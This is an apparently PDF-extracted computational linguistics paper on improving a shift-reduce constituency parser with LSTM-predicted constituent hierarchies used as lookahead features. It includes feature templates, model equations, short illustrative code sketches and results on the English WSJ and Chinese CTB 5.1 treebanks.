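# "The" starts "S -> NP"; "book" ends "S -> VP -> NP", as in the paper's notation.
```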
NP VB DT NN NP VP S (a) (b) DT NNS The students like this book ADJP JJ past CC and JJ present NP PP NP DT NN the table IN on Word s-type e-type The [s: S NP] [e: Ø ] past [s: ADJP] [e: Ø ] and [s: Ø] [e: Ø ] present [s: Ø] [e: ADJP ] students [s: Ø] [e: NP ] like [s: VP] [e: Ø ] this [s: NP NP] [e: Ø ] book [s: Ø] [e: NP ] on [s: PP] [e: Ø ] the [s: NP] [e: Ø ] table [s: Ø [e: S VP NP PP NP ] Figure 1: Example constituent hierarchies for the sentence “The past and present students like this book on the table”. (a) parse tree; (b) constituent hierarchies on words. For each word, we predict both the constituent hier- archy it starts and the constituent hierarchy it ends, using them as lookahead features. The task is challenging. First, it is significantly more difficult compared to simple sequence la- belling, since two sequences of constituent hierar- chies must be predicted for each word in the input sequence. Second, for high accuracies, global fea- tures from the full sentence are necessary since con- stituent hierarchies contain rich structural informa- tion. Third, to retain high speed for shift-reduce parsing, lookahead feature prediction must be exe- cuted efficiently. It is highly difficult to build such a model using manual discrete features and structured search. Fortunately, sequential recurrent neural networks (RNNs) are remarkably effective models to encode the full input sentence. We leverage RNNs for build- ing our constituent hierarchy predictor. In particular, an LSTM (Hochreiter and Schmidhuber, 1997) is used to learn global features automatically from the input words. For each word, a second LSTM is then used to generate the constituent hierarchies greed- ily using features from the hidden layer of the first LSTM, in the same way a neural language model de- coder generates output sentences for machine trans- lation (Bahdanau et al., 2015). The resulting model solves all three challenges raised above. For fully- supervised learning, we learn word embeddings as part of the model parameters. In the standard WSJ (Marcus et al., 1993) and CTB 5.1 tests (Xue et al., 2005), our parser gives 1.3 F1 and 2.3 F1 improvement, respectively, over the Initial State [φ, 0,false, 0] Final State [S,n,true,m : 2n <= m <= 4n] Induction Rules: SHIFT [S,i,false,k] [S|w,i+1,false,k+1] REDUCE-L/R-X [S|s1s0,i,false,k] [S|X,i,false,k+1] UNARY-X [S|s0,i,false,k] [S|X,i,false,k+1] FINISH [S,n,false,k] [S,n,true,k+1] IDLE [S,n,true,k] [S,n,true,k+1] Figure 2: Deduction system for the baseline shift- reduce parsing process. baseline of Zhu et al. (2013), resulting in a accuracy of 91.7 F1 for English and 85.5 F1 for Chinese, which are the best for fully-supervised models in the literature. We release our code, based on ZPar (Zhang and Clark, 2011; Zhu et al., 2013), at https://github.com/SUTDNLP/LookAheadConparser. 2 Baseline System We adopt the parser of Zhu et al. (2013) for a base- line, which is based on the shift-reduce process of Sagae and Lavie (2005) and the beam search strat- egy of Zhang and Clark (2011) with global percep- tron training. 46 2.1 The Shift-Reduce System Shift-reduce parsers process an input sentence in- crementally from left to right. A stack is used to maintain partial phrase-structures, while the incom- ing words are ordered in a buffer. At each step, a transition action is applied to consume an input word or construct a new phrase-structure. The set of tran- sition actions are • SHIFT: pop the front word off the buffer, and push it onto the stack. 
• REDUCE-L/R-X: pop the top two constituents off the stack (L/R means that the head is the left constituent or the right constituent, respec- tively), combine them into a new constituent with label X, and push the new constituent onto the stack. • UNARY-X: pop the top constituent off the stack, raise it to a new constituent X, and push the new constituent onto the stack. • FINISH: pop the root node off the stack and end parsing. • IDLE: no-effect action on a completed state without changing items on the stack or buffer, used to ensure that the same number of actions are in each item in beam search (Zhu et al., 2013). The deduction system for the process is shown in Figure 2, where a state is represented as [stack, buffer front index, completion mark, action index], and n is the number of words in the input. For ex- ample, given the sentence “They like apples”, the action sequence “SHIFT, SHIFT, SHIFT, REDUCE- L-VP, REDUCE-R-S” gives its syntax “(S They (VP like apples) )”. 2.2 Search and Training Beam-search is used for decoding with the k best state items at each step being kept in the agenda. During initialization, the agenda contains only the initial state [φ, 0,false, 0]. At each step, each state in the agenda is popped and expanded by apply- ing all valid transition actions, and the top k re- sulting states are put back onto the agenda (Zhu et al., 2013). The process repeats until the agenda is Description Templates UNIGRAM s0tc,s0wc,s1tc,s1wc,s2tc s2wc,s3tc,s3wc,q0wt,q1wt q2wt,q3wt,s0lwc,s0rwc s0uwc,s1lwc,s1rwc,s1uwc BIGRAM s0ws1w,s0ws1c,s0cs1w,s0cs1c s0wq0w,s0wq0t,s0cq0w,s0cq0t q0wq1w,q0wq1t,q0tq1w,q0tq1t s1wq0w,s1wq0t,s1cq0w,s1cq0t TRIGRAM s0cs1cs2c,s0ws1cs2c,s0cs1wq0t s0cs1cs2w,s0cs1cq0t,s0ws1cq0t s0cs1wq0t,s0cs1cq0w Extended s0llwc,s0lrwc,s0luwc s0rlwc,s0rrwc,s0ruwc s0ulwc,s0urwc,s0uuwc s1llwc,s1lrwc,s1luwc s1rlwc,s1rrwc,s1ruwc Table 1: Baseline feature templates, where si rep- resents the ith item on the top of the stack and qi denotes the ith item in the front of the buffer. The symbol w denotes the lexical head of an item; the symbol c denotes the constituent label of an item; the symbol t is the POS of a lexical head; u denotes unary child; sill denotes the left child of si’s left child. empty, and the best completed state is taken as out- put. The score of a state is the total score of the transi- tion actions that have been applied to build it: C(α) = N∑ i=1 Φ(αi) ·~θ (1) Here Φ(αi) represents the feature vector for the ith action αi in the state item α. N is the total number of actions in α. The model parameter vector ~θ is trained online using the averaged perceptron algorithm with the early-update strategy (Collins and Roark, 2004). 2.3 Baseline Features Our baseline features are taken from Zhu et al. (2013). As shown in Table 1, they include the UN- IGRAM, BIGRAM, TRIGRAM features of Zhang and Clark (2009) and the extended features of Zhu et al. (2013). 47 Templates s0gs,s0ge,s1gs,s1ge q0gs,q0ge,q1gs,q1ge Table 2: Lookahead feature templates, where si rep- resents the ith item on the top of the stack and qi de- notes the ith item in the front end of the buffer. The symbol gs and ge denote the next level constituent in the s-type hierarchy and e-type hierarchy, respec- tively. 3 Global Lookahead Features The baseline features suffer two limitations, as men- tioned in the introduction. First, they are relatively local to the state, considering only the neighbouring nodes of s0 (top of stack) and q0 (front of buffer). 
Second, they do not consider lookahead information beyond s3, or the syntactic structure of the buffer and sequence. We use an LSTM to capture full sen- tential information in linear time, representing such global information that is fed into the baseline parser as a constituent hierarchy for each word. Lookahead features are extracted from the constituent hierarchy to provide top-down guidance for bottom-up pars- ing. 3.1 Constituent Hierarchy In a constituency tree, each word can start or end a constituent hierarchy. As shown in Figure 1, the word “The” starts a constituent hierarchy “S → NP”. In particular, it starts a constituent S in the top level, dominating a constituent NP. The word “table” ends a constituent hierarchy “S → VP → NP → PP → NP”. In particular, it ends a constituent hierarchy, with a constituent S on the top level, dominating a VP (starting from the word “like”), and then an NP (starting from the noun phrase “this book”), and then a PP (starting from the word “in”), and finally an NP (starting from the word “the”). The extraction of constituent hierarchies for each word is based on un- binarized grammars, reflecting the unbinarized trees that the word starts or ends. The constituent hier- archy is empty (denoted as φ) if the corresponding word does not start or end a constituent. The con- stituent hierarchies are added into the shift-reduce parser as soft features (section 3.2). Formally, a constituent hierarchy is defined as [type : c1 → c2 → ... → cz], where c is a constituent label (e.g. NP), “→” repre- sents the top-down hierarchy, and type can be s or e, denoting that the current word starts or ends the con- stituent hierarchy, respectively, as shown in Figure 1. Compared with full parsing, the constituent hier- archies associated with each word have no forced structural dependencies between each other, and therefore can be modelled more easily, for each word individually. Being soft lookahead features rather than hard constraints, inter-dependencies are not crucial for the main parser. 3.2 Lookahead Features The lookahead feature templates are defined in Table 2. In order to ensure parsing efficiency, only simple feature templates are taken into consideration. The lookahead features of a state are instantiated for the top two items on the stack (i.e., s0 and s1) and buffer (i.e., q0 and q1). The new function Φ′ is defined to output the lookahead features vector. The scoring of a state in our model is based on Formula (1) but with a new term Φ′(αi) · ~θ′: C′(α) = N∑ i=1 Φ(αi) ·~θ + Φ′(αi) · ~θ′ For each word, the lookahead feature represents the next level constituent in the top-down hierarchy, which can guide bottom-up parsing. For example, Figure 3 shows two intermediate states during parsing. In Figure 3(a), the s-type and e-type lookahead features of s1 (i.e., the word “The” are extracted from the constituent hierarchy in the bottom level, namely NP and NULL, respec- tively. On the other hand, in Figure 3(b), the s-type lookahead feature of s1 is extracted from the s-type constituent hierarchy of same word “The”, but it is S based on current hierarchical level. The e-type lookahead feature, on the other hand, is extracted from the e-type constituent hierarchy of end word “students” of the VP constituent, which is NULL in the next level. Lookahead features for items on the buffer are extracted in the same way. The lookahead features are useful for guiding shift-reduce decisions given the current state. 
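As a rough illustration of how the extended score C′(α) combines the two feature sets, the sketch below scores a derivation with a single sparse weight map over baseline and lookahead features; the feature strings and state encoding are simplified placeholders rather than the parser's actual feature extractor or templates.

```python
# Rough sketch of the extended state score C'(alpha): for every applied action,
# both baseline features (Table 1 templates) and lookahead features (Table 2
# templates) fire, and their perceptron weights are summed.
from collections import defaultdict

weights = defaultdict(float)          # holds both theta and theta' entries

def baseline_features(state, action):
    # placeholder for the Table 1 templates (s0tc, s0wc, q0wt, ...)
    return [f"base:{atom}:{action}" for atom in state["base_atoms"]]

def lookahead_features(state, action):
    # e.g. s0gs / s0ge / q0gs / q0ge: next-level label of the s-/e-type
    # constituent hierarchy of the top stack and buffer items
    return [f"look:{name}={label}:{action}"
            for name, label in sorted(state["lookahead_atoms"].items())]

def state_score(derivation):
    # derivation: list of (state, action) pairs that built the state item
    return sum(weights[f]
               for state, action in derivation
               for f in baseline_features(state, action) + lookahead_features(state, action))

# toy usage: a single SHIFT step whose lookahead feature has a learned weight
weights["look:s0gs=ADJP:SHIFT"] = 0.7
derivation = [({"base_atoms": ["s0wc=The|DT"],
                "lookahead_atoms": {"s0gs": "ADJP", "s0ge": "NULL"}}, "SHIFT")]
print(state_score(derivation))        # 0.7
```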
For 48 stack buffer DT The JJ past CC and JJ present s0s1 S NP Ø ADJP Ø s0gs s0ge=nulls1gs s1ge=null Ø Ø Ø ADJP q0 q1 q0gs=null q0ge=null q1gs=null q1ge NP VB DT NN DT NNS s0s1 q0 q1 The students like this book S NP VP VP Ø NP NPØ Ø s1ge=null s0gs s0ge=null q0gs q0ge=null q1gs=null stack buffer q1ges1gs ADJP past and present (a) (b) incorrect Constituent hierarchy Look-ahead features Configuration Figure 3: Two intermediate states for parsing on the sentence “The past and present students like this book on the table”. Each item on the stack or buffer has two constituent hierarchies: s-type (left) and e-type (right), respectively, in the corresponding box. Note that the e-type constituent hierarchy of the word “students” is incorrectly predicted, yet used as soft constraints (i.e., features) in our model. example, given the intermediate state in Figure 3(a), s0 has a s-type lookahead feature ADJP, and q1 in the buffer has e-type lookahead feature ADJP. This indicates that the two items are likely reduced into the same constituent. Further, s0 cannot end a con- stituent because of the empty e-type constituent hi- erarchy. As a result, the final shift-reduce parser will assign a higher score to the SHIFT decision. 4 Constituent Hierarchy Prediction We propose a novel neural model for constituent hi- erarchy prediction. Inspired by the encoder-decoder framework for neural machine translation (Bah- danau et al., 2015; Cho et al., 2014), we use an LSTM to capture full sentence features, and another LSTM to generate the constituent hierarchies for each word. Compared with a CRF-based sequence labelling model (Roark and Hollingshead, 2009), the proposed model has three advantages. First, the global features can be automatically represented. Second, it can avoid the exponentially large num- ber of labels if constituent hierarchies are treated as unique labels. Third, the model size is relatively small, and does not have a large effect on the final parser model. As shown in Figure 4, the neural network con- sists of three main layers, namely the input layer, the encoder layer and the decoder layer. The input layer represents each word using its characters and token information; the encoder hidden layer uses a bidirectional recurrent neural network structure to learn global features from the sentence; and the de- coder layer predicts constituent hierarchies accord- ing to the encoder layer features, by using the atten- tion mechanism (Bahdanau et al., 2015) to compute the contribution of each hidden unit of the encoder. 4.1 Input Layer The input layer generates a dense vector representa- tion of each input word. We use character embed- dings to alleviate OOV problems in word embed- dings (Ballesteros et al., 2015; Santos and Zadrozny, 2014; Kim et al., 2016), concatenating character- embeddings of a word with its word embedding. Formally, the input representation xi of the word wi is computed by: xi = [xwi ; ci att] ci att = ∑ j αijc ′ ij, where xwi is a word embedding vector of the word wi according to a embedding lookup table, ci att is a character embedding form of the word wi, cij is the embedding of the jth character in wi, c′ij is the character window representation centered at cij, and αij is the contribution of the c′ij to ci att, which is computed by: αij = e f(xwi,c ′ ij) ∑ k e f(xwi,c ′ ik ) f is a non-linear transformation function. 
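A small numpy sketch of this input representation is given below; the dimensions, the bilinear-plus-tanh form chosen for f, and the variable names are illustrative assumptions, since the paper only states that f is a non-linear transformation.

```python
# Sketch: a word embedding concatenated with an attention-pooled character part,
# i.e. x_i = [x_wi ; c_i_att] with c_i_att = sum_j alpha_ij * c'_ij.
import numpy as np

def input_representation(word_vec, char_window_vecs, W):
    # word_vec: (d_w,); char_window_vecs: (m, d_c), one row per character window c'_ij
    scores = np.tanh(char_window_vecs @ W @ word_vec)   # stands in for f(x_wi, c'_ij)
    alpha = np.exp(scores) / np.exp(scores).sum()       # attention weights alpha_ij
    char_att = alpha @ char_window_vecs                 # c_i_att = sum_j alpha_ij c'_ij
    return np.concatenate([word_vec, char_att])         # x_i = [x_wi ; c_i_att]

rng = np.random.default_rng(0)
d_w, d_c, m = 50, 60, 7                                  # illustrative sizes
x = input_representation(rng.normal(size=d_w),
                         rng.normal(size=(m, d_c)),
                         0.1 * rng.normal(size=(d_c, d_w)))
print(x.shape)                                           # (110,)
```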
Figure 4: Structure of the constituent hierarchy prediction model. →h_i denotes the left-to-right encoder hidden units; ←h_i denotes the right-to-left encoder hidden units; s denotes the decoder hidden state vector; and y_ij is the jth label of the word w_i.
4.2 Encoder Layer
The encoder first uses a window strategy to represent input nodes with their corresponding local context nodes. Formally, a word window representation takes the form x'_i = [x_{i−win}; ...; x_i; ...; x_{i+win}].
Second, the encoder scans the input sentence and generates hidden units for each input word using a recurrent neural network (RNN), which represents features of the word from the global sequence. Formally, given the windowed input nodes x'_1, x'_2, ..., x'_n for the sentence w_1, w_2, ..., w_n, the RNN layer calculates a hidden node sequence h_1, h_2, ..., h_n.
Long Short-Term Memory (LSTM) mitigates the vanishing gradient problem in RNN training by introducing gates (i.e., input i, forget f and output o) and a cell memory vector c. We use the variation of Graves and Schmidhuber (2008). Formally, the values in the LSTM hidden layers are computed as follows:
i_i = σ(W1 x'_i + W2 h_{i−1} + W3 ⊙ c_{i−1} + b1)
f_i = 1 − i_i
c̃_i = tanh(W4 x'_i + W5 h_{i−1} + b2)
c_i = f_i ⊙ c_{i−1} + i_i ⊙ c̃_i
o_i = σ(W6 x'_i + W7 h_{i−1} + W8 ⊙ c_i + b3)
h_i = o_i ⊙ tanh(c_i),
where ⊙ is pair-wise multiplication. Further, in order to collect features for x_i from both x'_1, ..., x'_{i−1} and x'_{i+1}, ..., x'_n, we use a bidirectional variation (Schuster and Paliwal, 1997; Graves et al., 2013). As shown in Figure 4, the hidden units are generated by concatenating the corresponding hidden layers of a left-to-right LSTM →h_i and a right-to-left LSTM ←h_i, where ↔h_i = [→h_i; ←h_i] for each word w_i.
4.3 Decoder Layer
The decoder hidden layer uses two different LSTMs to generate the s-type and e-type sequences of constituent labels from each encoder hidden output, respectively, as shown in Figure 4. Each constituent hierarchy is generated bottom-up recurrently. In particular, a sequence of state vectors is generated recurrently, with each state yielding an output constituent label. The process starts with a zero state vector and ends when a NULL constituent is generated. The recurrent state transition process is achieved using an LSTM model with the hidden vectors of the encoder layer being used for context features.
Formally, for word w_i, the value of the jth state unit s_ij of the LSTM is computed by:
s_ij = f(s_{i,j−1}, a_ij, ↔h_i), [1]
where the context a_ij is computed by:
a_ij = Σ_k β_ijk ↔h_k
β_ijk = exp(f(s_{i,j−1}, ↔h_k)) / Σ_{k'} exp(f(s_{i,j−1}, ↔h_{k'}))
Here ↔h_k refers to the encoder hidden vector for w_k. The weights of contribution β_ijk are computed using the attention mechanism (Bahdanau et al., 2015). The constituent labels are generated from each state unit s_ij, where each constituent label y_ij is the output of a SOFTMAX function,
p(y_ij = l) = exp(s_ij^T W_l) / Σ_k exp(s_ij^T W_k)
y_ij = l denotes that the jth label of the ith word is l (l ∈ L).
[1] Here, different from typical MT models (Bahdanau et al., 2015), the chain is predicted sequentially in a feed-forward way with no feedback of the prediction made. We found that this fast alternative gives similar results.
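The following numpy sketch illustrates the decoding loop described above; the `step` function stands in for the decoder LSTM cell and a plain dot product stands in for the learned attention score f, under the illustrative assumption that state and encoder vectors share one dimension d.

```python
# Sketch of decoding one constituent hierarchy: start from a zero state, attend
# over the encoder vectors, update the state, emit the most probable label, and
# stop when NULL is generated. Shapes and the toy `step` are illustrative.
import numpy as np

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def predict_hierarchy(H, h_i, step, W_out, labels, max_depth=10):
    # H: (n, d) encoder vectors; h_i: (d,) vector of the current word
    # W_out: (num_labels, d); labels[k] is the label string for output index k
    s = np.zeros(H.shape[1])                      # the process starts from a zero state
    chain = []
    for _ in range(max_depth):
        beta = softmax(H @ s)                     # attention weights beta_ijk
        context = beta @ H                        # a_ij = sum_k beta_ijk * h_k
        s = step(s, context, h_i)                 # s_ij = f(s_i,j-1, a_ij, h_i)
        label = labels[int(np.argmax(W_out @ s))] # greedy softmax output y_ij
        if label == "NULL":
            break
        chain.append(label)                       # labels come out bottom-up
    return chain

# toy usage with a random stand-in for the decoder LSTM cell
rng = np.random.default_rng(1)
step = lambda s, a, h: np.tanh(s + a + h)
H = rng.normal(size=(5, 8))
print(predict_hierarchy(H, H[2], step, rng.normal(size=(4, 8)),
                        ["NULL", "NP", "VP", "S"]))
```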
As shown in Figure 4, the SOFTMAX functions are applied to the state units of the decoder, gener- ating hierarchical labels bottom-up, until the default label NULL is predicted. 4.4 Training We use two separate models to assign the s-type and e-type labels, respectively. For training each con- stituent hierarchy predictor, we minimize the follow- ing training objective: L(θ) = − T∑ i Zi∑ j log pijo + λ 2 ||θ||2, where T is the length of the sentence, Zi is the depth of the constituent hierarchy of the word wi, and pijo stands for p(yij = o), which is given by the SOFT- MAX function, and o is the gold label. We apply back-propagation, using momentum stochastic gradient descent (Sutskever et al., 2013) with a learning rate of η = 0.01 for optimization and regularization parameter λ = 10−6. 5 Experiments 5.1 Experiment Settings Our English data are taken from the Wall Street Jour- nal (WSJ) sections of the Penn Treebank (Marcus et al., 1993). We use sections 2-21 for training, section 24 for system development, and section 23 for final performance evaluation. Our Chinese data are taken from the version 5.1 of the Penn Chinese Treebank (CTB) (Xue et al., 2005). We use articles 001- 270 and 440-1151 for training, articles 301-325 for sys- tem development, and articles 271-300 for final per- formance evaluation. For both English and Chinese hyper-parameters value Word embedding size 50 Word window size 2 Character embedding size 30 Character window size 2 LSTM hidden layer size 100 Character hidden layer size 60 Table 3: Hyper-parameter settings s-type e-type parser 1-layer 93.39 81.50 90.43 2-layer 93.76 83.37 90.72 3-layer 93.84 83.42 90.80 Table 4: Performance of the constituent hierarchy predictor and the corresponding parser on the WSJ dev dataset. n-layer denotes an LSTM model with n hidden layers. data, we adopt ZPar2 for POS tagging, and use ten- fold jackknifing to assign POS tags automatically to the training data. In addition, we use ten-fold jack- knifing to assign constituent hierarchies automati- cally to the training data for training the parser using the constituent hierarchy predictor. We use F1 score to evaluate constituent hierarchy prediction. For example, if the prediction is “S → S → VP → NP” and the gold is “S → NP → NP”, the evaluation process matches the two hierarchies bottom-up. The precision is 2/4 = 0.5, the recall is 2/3 = 0.66 and the F1 score is 0.57. A label is counted as correct if and only if it occurs at the cor- rect position. We use EVALB to evaluate parsing performance, including labelled precision (LP ), labelled recall (LR), and bracketing F1.3 5.2 Model Settings For training the constituent hierarchy prediction model, gold constituent labels are derived from la- belled constituency trees in the training data. The hyper-parameters are chosen according to develop- ment tests, and the values are shown in Table 3. For the shift-reduce constituency parser, we set the beam size to 16 for both training and decoding, which achieves a good tradeoff between efficiency 2https://github.com/SUTDNLP/ZPar 3http://nlp.cs.nyu.edu/evalb 51 s-type e-type parser all 93.76 83.37 90.72 all w/o wins 93.62 83.34 90.58 all w/o chars 93.51 83.21 90.33 all w/o chars & wins 93.12 82.36 89.18 Table 5: Performance of the constituent hierarchy predictor and the corresponding parser on the WSJ dev dataset. all denotes the proposed model with- out ablation. wins denotes input windows. chars denotes character-based attention. and accuracy (Zhu et al., 2013). 
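Before turning to the results, the hierarchy-level F1 described in Section 5.1 can be sketched as follows; the function is an illustrative reconstruction, not the official evaluation script, and it reproduces the worked example above (precision 0.5, recall 0.66, F1 0.57).

```python
# Sketch of hierarchy-level F1: labels are matched position by position from
# the bottom of the predicted and gold hierarchies (both written top-down).
def hierarchy_prf(pred, gold):
    p = list(reversed(pred.split(" -> ")))   # bottom-up order
    g = list(reversed(gold.split(" -> ")))
    correct = sum(1 for a, b in zip(p, g) if a == b)
    precision = correct / len(p)
    recall = correct / len(g)
    f1 = 2 * precision * recall / (precision + recall) if correct else 0.0
    return precision, recall, f1

print(hierarchy_prf("S -> S -> VP -> NP", "S -> NP -> NP"))
# (0.5, 0.666..., 0.571...), matching the example in Section 5.1
```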
The optimal train- ing iteration number is determined on the develop- ment sets. 5.3 Results of Constituent Hierarchy Prediction Table 4 shows the results of constituent hierarchy prediction, where word and character embeddings are randomly initialized, and fine-tuned during train- ing. The third column shows the development pars- ing accuracies when the labels are used for looka- head features. As Table 4 shows, when the number of hidden layers increases, both s-type and e-type constituent hierarchy prediction improve. The accu- racy of e-type prediction is relatively lower due to right-branching in the treebank, which makes e-type hierarchies longer than s-type hierarchies. In addi- tion, a 3-layer LSTM does not give significant im- provements compared to a 2-layer LSTM. For better tradeoff between efficiency and accuracy, we choose the 2-layer LSTM as our constituent hierarchy pre- dictor. Table 5 shows ablation results for constituent hi- erarchy prediction given by different reduced ar- chitectures, which include an architecture without character embeddings and an architecture with nei- ther character embeddings nor input windows. We find that the original architecture achieves the high- est performance on constituent hierarchy prediction, compared to the two baselines. The baseline only without character embeddings has relatively small influence on constituent hierarchy prediction. On the other hand, the baseline only without input word windows has relatively smaller influence on con- stituent hierarchy prediction. Nevertheless, both of these two ablation architectures lead to lower pars- Parser LR LP F1 Fully-supervised Ratnaparkhi (1997) 86.3 87.5 86.9 Charniak (2000) 89.5 89.9 89.5 Collins (2003) 88.1 88.3 88.2 Sagae and Lavie (2005)† 86.1 86.0 86.0 Sagae and Lavie (2006)† 87.8 88.1 87.9 Petrov and Klein (2007) 90.1 90.2 90.1 Carreras et al. (2008) 90.7 91.4 91.1 Shindo et al. (2012) N/A N/A 91.1 Zhu et al. (2013)† 90.2 90.7 90.4 Socher et al. (2013)* N/A N/A 90.4 Vinyals et al. (2015)* N/A N/A 88.3 Cross and Huang (2016)*† N/A N/A 91.3 Dyer et al. (2016)*† N/A N/A 91.2 This work 91.3 92.1 91.7 Ensemble Shindo et al. (2012) N/A N/A 92.4 Vinyals et al. (2015)* N/A N/A 90.5 Rerank Charniak and Johnson (2005) 91.2 91.8 91.5 Huang (2008) 92.2 91.2 91.7 Dyer et al. (2016)*† N/A N/A 93.3 Semi-supervised McClosky et al. (2006) 92.1 92.5 92.3 Huang and Harper (2009) 91.1 91.6 91.3 Huang et al. (2010) 91.4 91.8 91.6 Zhu et al. (2013)† 91.1 91.5 91.3 Durrett and Klein (2015)* N/A N/A 91.1 Table 6: Comparison of related work on the WSJ test set. * denotes neural parsing; † denotes methods using a shift-reduce framework. ing accuracies. The baseline removing both the character embeddings and the input word windows has a relatively low F-score. 5.4 Final Results For English, we compare the final results with previous related work on the WSJ test sets. As shown in Table 64, our model achieves 1.3% F1 improvement compared to the baseline parser with fully-supervised learning (Zhu et al., 2013). Our model outperforms the state-of-the-art fully- supervised system (Carreras et al., 2008; Shindo et al., 2012) by 0.6% F1. In addition, our fully- supervised model also catches up with many state- of-the-art semi-supervised models (Zhu et al., 2013; 4We treat the methods as semi-supervised if they use pre- trained word embeddings, word clusters (e.g., Brown clusters) or extra resources. 
52 Parser LR LP F1 Fully-supervised Charniak (2000) 79.6 82.1 80.8 Bikel (2004) 79.3 82.0 80.6 Petrov and Klein (2007) 81.9 84.8 83.3 Zhu et al. (2013)† 82.1 84.3 83.2 Wang et al. (2015)‡ N/A N/A 83.2 Dyer et al. (2016)*† N/A N/A 84.6 This work 85.2 85.9 85.5 Rerank Charniak and Johnson (2005) 80.8 83.8 82.3 Dyer et al. (2016)*† N/A N/A 86.9 Semi-supervised Zhu et al. (2013)† 84.4 86.8 85.6 Wang and Xue (2014)‡ N/A N/A 86.3 Wang et al. (2015)‡ N/A N/A 86.6 Table 7: Comparison of related work on the CTB5.1 test set. * denotes neural parsing; † denotes methods using a shift-reduce framework; ‡ denotes joint POS tagging and parsing. Huang and Harper, 2009; Huang et al., 2010; Dur- rett and Klein, 2015) by achieving 91.7% F1 on WSJ test set. The size of our model is much smaller than the semi-supervised model of Zhu et al. (2013), which contains rich features from a large automat- ically parsed corpus. In contrast, our model is about the same in size compared to the baseline parser. We carry out Chinese experiments with the same models, and compare the final results with previous related work on the CTB test set. As shown in Table 7, our model achieves 2.3% F1 improvement com- pared to the state-of-the-art baseline system with fully-supervised learning (Zhu et al., 2013), which is by far the best result in the literature. In addition, our fully-supervised model is also comparable to many state-of-the-art semi-supervised models (Zhu et al., 2013; Wang and Xue, 2014; Wang et al., 2015; Dyer et al., 2016) by achieving 85.5% F1 on the CTB test set. Wang and Xue (2014) and Wang et al. (2015) do joint POS tagging and parsing. 5.5 Comparison of Speed Table 8 shows the running times of various parsers on test sets on a Intel 2.2 GHz processor with 16G memory. Our parsers are much faster than the re- lated parser with the same shift-reduce framework (Sagae and Lavie, 2005; Sagae and Lavie, 2006). Compared to the baseline parser, our parser gives Parser #Sent/Second Ratnaparkhi (1997) Unk Collins (2003) 3.5 Charniak (2000) 5.7 Sagae and Lavie (2005) 3.7 Sagae and Lavie (2006) 2.2 Petrov and Klein (2007) 6.2 Carreras et al. (2008) Unk Zhu et al. (2013) 89.5 This work 79.2 Table 8: Comparison of running times on the test set, where the time for loading models is excluded. The running times of related parsers are taken from Zhu et al. (2013). significant improvement on accuracies (90.4% to 91.7% F1) at the speed of 79.2 sentences per sec- ond5, in contrast to 89.5 sentences per second on the standard WSJ benchmark. 6 Error Analysis We conduct error analysis by measuring parsing ac- curacies against: different phrase types, constituents of different span lengths, and different sentence lengths. 6.1 Phrase Type Table 9 shows the accuracies of the baseline and the final parsers with lookahead features on 9 common phrase types. As the results show, while the parser with lookahead features achieves improvements on all of the frequent phrase types, there are relatively higher improvements on VP, S, SBAR and WHNP. The constituent hierarchy predictor has relatively better performance on s-type labels for the con- stituents VP, WHNP and PP, which are prone to errors by the baseline system. The constituent hi- erarchy can give guidance to the constituent parser for tackling the issue. Compared to the s-type con- stituent hierarchy, the e-type constituent hierarchy 5The constituent hierarchy prediction is excluded, which processes an average of 150 sentences per second on a single CPU. 
The cost of this step is far less than the cost of parsing, and can be essentially eliminated by pipelining the constituent hierarchy prediction and the shift-reduce decoder, by launching the constituent hierarchy predictor first, and then starting pars- ing in parallel as soon as the lookahead output is available for the first sentence, since the lookahead will outpace the parsing from that point forward. 53 2 4 6 8 10 12 14 85 90 95 span length F 1 S co re (% ) baseline lookahead Figure 5: Comparison with the baseline on spans of different lengths. is relatively more difficult to predict, particularly for the constituents with long spans such as VP, S and SBAR. Despite this, the e-type constituent hi- erarchies with relatively low accuracies also benefit prediction of constituents with long spans. 6.2 Span Length Figure 5 shows the F1-scores of the two parsers on constituents with different span lengths. As the re- sults show, lookahead features are helpful on both large spans and small spans, and the performance gap between the two parsers is larger as the size of span increases. This reflects the usefulness of long- range information captured by the constituent hier- archy predictor and lookahead features. 6.3 Sentence Length Figure 6 shows the F1-scores of the two parsers on sentences of different lengths. As the results show, the parser with lookahead features outperforms the baseline system on both short sentences and long sentences. Also, the performance gap between the two parsers is larger as the length of sentence in- creases. The constituent hierarchy predictors generate hi- erarchical constituents for each input word using global information. For longer sentences, the pre- dictors yield deeper constituent hierarchies, offer- ing corresponding lookahead features. As a result, compared to the baseline parser, the performance of the parser with lookahead features decreases more slowly as the length of the sentences increases. 10 20 30 40 50 50+ 85 90 95 F 1 sc or e (% ) baseline lookahead Figure 6: Comparison with the baseline on sen- tences of different lengths. Sentences with length [0, 10) fall in the bin 10. 7 Related Work Our lookahead features are similar in spirit to the pruners of Roark and Hollingshead (2009) and Zhang et al. (2010b), which infer the maximum length of constituents that a particular word can start or end. However, our method is different in three main ways. First, rather than using a CRF with sparse local word window features, a neural network is used for dense global features on the sentence. Second, not only the size of constituents but also the constituent hierarchy is identified for each word. Third, the results are added into a transition-based parser as soft features, rather then being used as hard constraints to a chart parser. Our concept of constituent hierarchies is simi- lar to supertags in the sense that both are shallow parses. For lexicalized grammars such as Combi- natory Categorial Grammar (CCG), Tree-Adjoining Grammar (TAG) and Head-Driven Phrase Structure Grammar (HPSG), each word in the input sentence is assigned one or more supertags, which are used to identify the syntactic role of the word to constrain parsing (Clark, 2002; Clark and Curran, 2004; Car- reras et al., 2008; Ninomiya et al., 2006; Dridan et al., 2008; Faleńska et al., 2015). For a lexical- ized grammar, supertagging can benefit the parsing in both accuracy and efficiency by offering almost- parsing information. In particular, Carreras et al. 
